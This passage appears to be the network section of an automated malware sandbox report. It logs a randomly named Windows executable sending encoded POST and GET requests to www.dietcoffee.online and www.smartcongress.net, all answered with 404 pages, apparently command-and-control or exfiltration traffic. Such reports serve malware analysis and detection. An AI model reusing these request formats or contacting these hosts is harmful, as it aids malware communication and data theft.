                                                                                                            Data Ascii: x4=lAxCRhwFTpS/Op5QRmcgzTUOOUXeJ5QGcX9yK++MqSk3DMyi++5idzqi0h2GpAtw3+LSwdVpAgOkpVu09VzxQ5jSl5RJJUs9IzBPCtJMpwVbRlrqx+JbijtdjNlPb7JULm524qhLa43NHGcqhW5MdksXesb0VwWSVpx9nQk/kb1VkjRCIkRMHsVqo06+1WyukMWEqRMXgI8kzlQE5gIjfMoC7LBtSknT8YmY3Rl6HNWeTaIxvgJUc7ciTjqqzcsISILjdbN7GXk7+/EjNDnRNJURsjEq5hfr/UrM7qq9Yeua8ERiJ/Hq4pRtomJkqGx3mXOMPJjq8uNp1KdF0aMNhbSjxFdbOXxLQzLGBiMmc0DzTrMG/YA6OGbCOLypyxr3/9oZydmh/q3M2jNCY4gK/xFz5OWOKuyy96eZM7qcdNOC+noRiY+kmdX5V3T75T5ySGf5Mo4TUSLHDp/cLU9rKiz3WXCcE8BDYOyhmvxVGbroWI4mFCCWxO9SJbKoBwmmer+dbIW8YtyLIWYe3IV9Y7sM9ZdzTVVvjhH8JF8X9Ippy2tTbodycasn6BZYsbz5A3/xpIIqIRZi7Qn1FUrbUmzLPrirKvXRytXkVkeAvAv1EwQfYWYUvydkg7maS3OQFmlEMcwy9S41lBhEO4YcAMWVsJjuXfpq6SnzkvcrcB6WXLN+XOuviibdBLziCXa428fP738cahprmfYFQO0lYkG0T4LXJUfbNLANKjDsBTvLhWp/g3zoA3iZYTtx6CZ4W6NSCtQOIakfFcYMFJH402Q3HiobZ+yUQR2bS2w2Av2YVYLJ546sIPMTZkJ7Mb7uhKVDYX4PJ/iz9s3ye8eEfCzqkGkiVr379di6CW+hKv8mgI/JoPcZRpZsyDcUSHbORT4CTNQaWeO26hh6bpEyhdTifkrHjGLEVDQ8rPMmL29nNjRFa3GL1cuvViJ7ytNbJSSw7uCMxFCDnhHYL5YadHQo8rXSP/Yom685SXJVUS0oy7b5V [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:13.161119938 CET309OUTData Raw: 41 74 4b 77 4b 46 34 4d 61 59 67 68 34 6c 42 78 5a 74 6f 68 61 77 4d 46 6c 7a 37 65 6a 6e 62 68 51 67 69 62 38 4b 50 33 4a 53 48 6e 31 5a 59 66 35 6d 37 68 68 71 52 78 58 76 41 38 34 62 31 35 63 74 2b 38 44 36 5a 64 44 34 5a 46 47 2b 43 31 39 37
                                                                                                            Data Ascii: AtKwKF4MaYgh4lBxZtohawMFlz7ejnbhQgib8KP3JSHn1ZYf5m7hhqRxXvA84b15ct+8D6ZdD4ZFG+C197amCXhw0go0yZFOtoHC+bmrbBsOLzeV/fVmFsFrIyR/RWqmknRxNm8UN71rOCTAcuHiAVfWd7OXKvhFCMAscMHLqBo4EjMu+NSFsjSvQfwM5urqhsRrtPWi0kBglRfFcASXg7NAwbRNp8gwkbuH5ZIpGWENs6OkE87
                                                                                                            Dec 12, 2024 10:22:14.262713909 CET391INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:14 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.224918877.68.64.45801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:15.706136942 CET820OUTPOST /ugyg/ HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/ugyg/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 4f 71 52 51 51 79 41 67 31 7a 55 4f 50 55 58 65 44 5a 52 44 63 58 78 51 4b 38 53 63 70 6a 73 33 44 39 43 69 2b 4d 42 69 61 7a 72 51 74 52 32 43 30 77 74 6c 33 2b 4b 73 77 5a 56 70 41 67 61 6b 37 6e 6d 30 71 45 79 44 54 4a 6a 51 75 5a 52 64 4a 54 6b 4f 49 7a 64 66 43 73 52 4d 70 79 42 62 44 78 48 71 6a 73 52 62 77 6a 73 33 30 39 6b 4e 62 36 31 46 4c 6d 70 75 34 72 74 4c 61 4b 44 4e 48 58 38 71 79 52 74 4d 58 45 73 57 58 4d 61 36 46 43 58 66 4b 71 4a 4c 73 53 59 35 6a 6f 68 4e 6e 6a 78 6b 46 56 42 41 4e 70 46 42 74 78 54 62 78 45 33 34 2f 41 3d 3d
                                                                                                            Data Ascii: x4=lAxCRhwFTpS/OqRQQyAg1zUOPUXeDZRDcXxQK8Scpjs3D9Ci+MBiazrQtR2C0wtl3+KswZVpAgak7nm0qEyDTJjQuZRdJTkOIzdfCsRMpyBbDxHqjsRbwjs309kNb61FLmpu4rtLaKDNHX8qyRtMXEsWXMa6FCXfKqJLsSY5johNnjxkFVBANpFBtxTbxE34/A==
                                                                                                            Dec 12, 2024 10:22:16.929047108 CET391INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:16 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.224918977.68.64.45801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:18.387567043 CET2472OUTPOST /ugyg/ HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.dietcoffee.online
                                                                                                            Referer: http://www.dietcoffee.online/ugyg/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 6c 41 78 43 52 68 77 46 54 70 53 2f 66 36 68 51 56 54 41 67 77 54 55 4e 42 30 58 65 4a 35 51 45 63 58 39 51 4b 2b 2b 4d 71 57 55 33 44 4b 6d 69 77 4f 35 69 63 7a 72 51 72 52 32 47 70 41 74 2f 33 2f 72 43 77 64 59 57 41 6c 4b 6b 70 52 36 30 39 57 62 78 5a 5a 6a 53 71 5a 51 76 4a 54 6b 66 49 79 74 54 43 74 6b 70 70 79 5a 62 44 6a 76 71 32 73 52 59 73 7a 73 33 30 39 6b 52 62 36 30 67 4c 6d 77 37 34 72 45 51 61 37 7a 4e 48 32 63 71 31 32 35 4e 43 55 73 53 4a 63 62 71 56 77 61 42 56 70 78 35 6e 55 45 5a 6b 62 35 56 69 77 4a 43 49 6e 35 4c 62 4d 56 74 6c 55 36 2b 78 57 79 6f 6b 4d 57 69 71 52 4d 58 67 49 41 6b 79 31 51 45 35 69 67 69 62 4d 6f 43 6b 37 42 61 57 6b 37 68 38 59 6a 37 33 51 56 71 45 36 32 65 42 49 51 78 71 51 4a 55 4d 62 64 49 54 6a 71 33 35 38 74 70 53 49 54 30 64 62 39 52 47 58 6b 37 2b 36 51 6a 63 47 4c 52 45 35 55 52 7a 7a 45 72 7a 42 66 6f 2f 55 75 72 37 71 32 39 59 66 47 61 39 7a 31 69 4c 38 76 74 33 35 52 67 73 6d 4a 69 38 47 78 59 6d 58 53 32 50 4a 61 50 38 74 46 70 31 49 46 [TRUNCATED]
                                                                                                            Data Ascii: x4=lAxCRhwFTpS/f6hQVTAgwTUNB0XeJ5QEcX9QK++MqWU3DKmiwO5iczrQrR2GpAt/3/rCwdYWAlKkpR609WbxZZjSqZQvJTkfIytTCtkppyZbDjvq2sRYszs309kRb60gLmw74rEQa7zNH2cq125NCUsSJcbqVwaBVpx5nUEZkb5ViwJCIn5LbMVtlU6+xWyokMWiqRMXgIAky1QE5igibMoCk7BaWk7h8Yj73QVqE62eBIQxqQJUMbdITjq358tpSIT0db9RGXk7+6QjcGLRE5URzzErzBfo/Uur7q29YfGa9z1iL8vt35RgsmJi8GxYmXS2PJaP8tFp1IFF27MNgrSgr1dfE39PQ1TkBiIQc3HzVqMG4ec5BWbALLy/kBqI/9s3yYah8erMwX5CSvUJzRF09OWjFOym96jaM/uMdc+C/XoRyqmj5dX2dXSwsD41SGf1MssDUgLHDq3cKGFrKizwAHCWdsFxYOulmvtFGYzoW7wmFAqW8O9SdrKvPQmGerqnbNKKbdWLIwke1Op9Q7sO7Zd2OFVIjhX8JB9a9JxpzUJTYMJyT6sr5BZ9sbz1A3z1pMk6ITti7T/1DVrbYGzGc7ivOvXcytepVnaqvBn1CRwfZnYUuSdqi7maLnPXFlUxMe0i9Tw1i09EF4Yfb8WWuJjtTfov6S3zkvQrcBSWW4V+cfuvuybff7z0L3eI246872I2aitrnOYFAdMkU0G2GIKWNUf/NLABKnmhGnjLhjd/hVLrfHieXzsx3iZYW8t4CskeIN0fFfAMF/b40GQ3HioYZ+yqQR6lS3APAv2YUJLJ5LSsAvMWSEIlIb7whKBlYXQlJ/Oz8+vye8eHSSzpjGkhVrzc9djrCWyhKZ8myqHJos4ZBZZs4jcVE3bTRT5JTI5HWfO28BB6YvZA89ThZkrrqmOEVDMSrNgmKFpnPyRFbHGLqMusaCJU8NxHJSOW7vTJxRmDnSPYJ4YbQXQr4rXQP/Uhm60LSXxjUV4oybb5G [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:18.506958961 CET1773OUTData Raw: 45 75 4b 77 64 49 59 4e 34 59 67 67 68 6c 41 77 45 74 70 74 61 77 49 52 6c 7a 59 47 6a 6e 37 68 58 69 69 62 70 4b 50 32 65 53 48 76 58 5a 64 58 70 6d 36 78 68 6f 7a 4a 58 6a 54 6b 34 48 31 35 61 74 2b 38 7a 2b 5a 51 7a 34 5a 46 67 2b 43 70 39 37
                                                                                                            Data Ascii: EuKwdIYN4YgghlAwEtptawIRlzYGjn7hXiibpKP2eSHvXZdXpm6xhozJXjTk4H15at+8z+ZQz4ZFg+Cp97e6CXi40g40xWVOghnC9RGqfBsOHzf5BfSeFsXTI6CnRXamiuxwBwNoT71nCCRomuyeAUsud+7DKrBF5SQs0MHHOBoomjN+UOgtsjivQVTk+4rqjmxrsPWickB4hReoHAWbg7IUwbhNo7QwiYuGmZIl/WE1O6O0E86
                                                                                                            Dec 12, 2024 10:22:19.610274076 CET391INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:19 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 7d 8a 95 bb 2c 1a 8e 4d 0f f2 13 49 10 89 29 07 8f 98 56 4a 82 14 69 d1 f0 f6 16 b8 78 9c 9d 99 6f 96 ee e2 6b c4 ef 65 02 67 7e c9 a1 ac 4e 79 16 81 b7 47 cc 12 9e 22 c6 3c de 9c a3 1f 20 26 85 c7 08 55 f6 d5 31 aa 64 2d 9c b0 ad ed 24 0b 83 10 0a 6d 21 d5 53 2f 28 6e 47 42 71 0d d1 87 16 f3 d2 3b b0 bf 8c 53 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 ba e5 80 53 33 37 08 df da 40 ef 90 cf 05 09 ba 07 ab 5a 03 46 8e 1f 39 fa 14 07 d7 c6 15 ec 56 96 87 c8 0f f1 1a 79 64 cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: b3M0},MI)VJixokeg~NyG"< &U1d-$m!S/(nGBq;S+|OX)S37@ZF9Vyd0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.224919077.68.64.45801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:21.035830021 CET546OUTGET /ugyg/?x4=oCZiSXk+P+GRfK1BPGYe2jAbGy6NfuRnUXBBKsmFkR5XdaXHzOV8cRyPm0SlplEQyKXzoexQZCmJiHD77mrvft/NmZQ5KxY7IzFSGPZt8SE9dF3swuxanCIPkslF&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.dietcoffee.online
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:22:22.262573004 CET373INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.25.3
                                                                                                            Date: Thu, 12 Dec 2024 09:22:22 GMT
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 67 79 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ugyg/ was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.2249191146.88.233.115801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:27.803133011 CET2472OUTPOST /m1g9/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Referer: http://www.smartcongress.net/m1g9/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 65 6e 48 69 74 69 2b 72 4d 41 62 49 57 74 54 42 78 65 4c 4a 71 70 55 63 48 42 77 4c 44 4d 66 54 67 44 58 52 72 32 39 42 7a 54 74 76 57 70 4f 61 50 43 56 6d 39 59 4a 78 68 45 73 4a 56 52 2f 4a 2f 55 56 4a 4a 4a 46 76 48 35 33 4a 44 34 37 6d 78 59 38 59 72 46 75 47 4b 58 61 57 47 70 6b 6f 76 51 4c 4e 6f 49 71 74 42 47 67 71 36 56 6e 65 56 48 43 6f 39 41 6b 70 56 4d 6e 4e 32 5a 5a 72 68 2f 37 77 77 2f 66 46 53 58 76 4f 4f 55 63 74 58 59 66 61 4a 31 57 48 54 78 68 30 59 41 76 70 64 39 51 73 42 6f 5a 73 52 61 45 79 74 50 66 4e 58 42 68 52 79 42 38 70 6e 77 50 38 63 34 68 65 53 31 2f 31 61 6b 72 6e 46 46 7a 45 67 4f 4c 63 41 4c 72 42 5a 57 62 71 2b 61 4d 62 6e 32 37 33 65 77 6b 36 5a 54 62 71 71 53 69 33 38 36 62 32 31 32 34 43 71 65 79 43 33 42 36 39 37 70 57 59 38 2f 4c 54 6a 55 30 5a 6c 64 71 33 69 70 6d 59 4b 67 6f 4c 6a 72 37 46 66 58 39 70 6b 41 45 34 33 67 57 73 36 71 75 55 32 62 6c 63 4a 6f 77 5a 37 4b 52 4e 77 70 64 61 63 51 35 42 64 38 4c 63 36 4d 4a [TRUNCATED]
                                                                                                            Data Ascii: x4=PsWFZnsR91nuenHiti+rMAbIWtTBxeLJqpUcHBwLDMfTgDXRr29BzTtvWpOaPCVm9YJxhEsJVR/J/UVJJJFvH53JD47mxY8YrFuGKXaWGpkovQLNoIqtBGgq6VneVHCo9AkpVMnN2ZZrh/7ww/fFSXvOOUctXYfaJ1WHTxh0YAvpd9QsBoZsRaEytPfNXBhRyB8pnwP8c4heS1/1akrnFFzEgOLcALrBZWbq+aMbn273ewk6ZTbqqSi386b2124CqeyC3B697pWY8/LTjU0Zldq3ipmYKgoLjr7FfX9pkAE43gWs6quU2blcJowZ7KRNwpdacQ5Bd8Lc6MJKFulxppwwwMU0Q9o/DJFApzU6WT0ayXbmi7f/nYNJKiyPwLIHibQITuko2JOGL6Ek6abHJrieTHqcrtyjKYXhU67Urlcwsy+pOJ3fdoQWNLjo/C7atb2m/0QPKqS+4Ug1zGukVHetfrsTQmhJYt4wnJmy4dMWeNNYyy5B+q8TvAN6iBJPP2Xw2IknpJ44BPla6bqIEmwxwpOtfNJIEomLD/WNzJ+R206djGld7Xftcito6mbHaembNawVZ2Jkwobshp9vfzSwtRXEw8CGS31armrBJycSre/vmGmQHuQqI8lIPdbOEjcwnofQboIIeu6sFycrJy5UUdiS/M/HNA00DWT8QkjwRuLUDhK2z7pMqTEKbsMRyiBOv6yKY4FWOq2ZAdik4AMvIYJ7A1QWOJF2dKdMH0VOOOc9TJcjweCB7QwsfAAE01CdfaxrDnCCMk8YeY4tU96YYBHVP7YEMtfcBh1Xa+OKJQuB53pQ0Tm0C++oXSRW6cRegjg3ZhBYV8BsnlI147E6DaGcXpELavnTMQnG4mW4zIPeazlUAPUvP42Fu/FAsYPiWfJN5IGPx5zZEvwehWgJiKYW0FFObXTkJ7QvL0W/ZK14hrsjlBQ07KsaLwJhBgoCsT3kM1LMHXHUJKxACHTsJK+HgIFjAGt8PiVNoE+HiKKmt [TRUNCATED]
                                                                                                            Dec 12, 2024 10:22:27.923190117 CET309OUTData Raw: 41 78 2f 34 6d 77 32 31 6f 76 74 6e 51 63 57 37 74 61 57 70 79 66 51 4a 6b 69 77 36 32 37 48 78 51 62 51 6b 76 69 35 6f 39 4e 72 78 45 32 59 50 6d 64 6e 37 72 37 6c 4f 74 4b 55 4b 2f 34 72 48 33 34 75 31 45 76 36 6a 6e 35 38 4b 63 49 6d 71 79 58
                                                                                                            Data Ascii: Ax/4mw21ovtnQcW7taWpyfQJkiw627HxQbQkvi5o9NrxE2YPmdn7r7lOtKUK/4rH34u1Ev6jn58KcImqyXkdEQ0zqRM1FKV5iItFv2+/gtLqKF8YAZOkcfwR1ZYAvFkhE76DcpZl9KaV3pu9bWO1UIjbllMWBJMkxu14WobO/fxmurioTGCxCQsWyFvybHXFwA/MHJAA6TXbyiIXUrPKyJ355iq2DCNdode9qwNOjWiU6qQ/KO/
                                                                                                            Dec 12, 2024 10:22:29.374142885 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:29 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.2249192146.88.233.115801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:30.461694002 CET820OUTPOST /m1g9/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.smartcongress.net
                                                                                                            Referer: http://www.smartcongress.net/m1g9/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 50 73 57 46 5a 6e 73 52 39 31 6e 75 65 67 7a 69 2f 6e 43 72 4d 67 62 49 62 4e 54 42 36 2b 4b 43 71 70 5a 70 48 41 30 62 44 2f 50 54 6e 54 6e 52 72 46 5a 42 77 54 74 73 64 4a 4f 65 51 53 56 7a 39 59 4a 58 68 41 73 4a 56 56 66 4a 75 43 52 4a 41 72 39 67 50 70 33 4c 49 59 37 6c 78 59 77 37 72 46 53 57 4b 55 61 57 47 72 67 6f 73 51 62 4e 69 4c 43 74 4b 57 67 6f 72 6c 6e 4a 56 48 4f 35 39 42 55 78 56 4d 7a 4e 32 73 35 72 68 4e 44 77 31 75 66 46 64 33 76 4c 61 6b 63 7a 57 37 71 43 4c 30 53 58 52 6e 64 4c 59 67 58 78 5a 4e 45 63 4f 70 64 2f 53 6f 4a 54 72 76 6d 41 43 44 4d 75 68 51 3d 3d
                                                                                                            Data Ascii: x4=PsWFZnsR91nuegzi/nCrMgbIbNTB6+KCqpZpHA0bD/PTnTnRrFZBwTtsdJOeQSVz9YJXhAsJVVfJuCRJAr9gPp3LIY7lxYw7rFSWKUaWGrgosQbNiLCtKWgorlnJVHO59BUxVMzN2s5rhNDw1ufFd3vLakczW7qCL0SXRndLYgXxZNEcOpd/SoJTrvmACDMuhQ==
                                                                                                            Dec 12, 2024 10:22:31.731724024 CET380INHTTP/1.1 404 Not Found
                                                                                                            content-type: text/html; charset=iso-8859-1
                                                                                                            content-length: 196
                                                                                                            date: Thu, 12 Dec 2024 09:22:31 GMT
                                                                                                            server: LiteSpeed
                                                                                                            x-tuned-by: N0C
                                                                                                            connection: close
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.2249193146.88.233.115801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:22:33.121078968 CET2472OUTPOST /m1g9/ HTTP/1.1
                                                                                                            Host: www.smartcongress.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
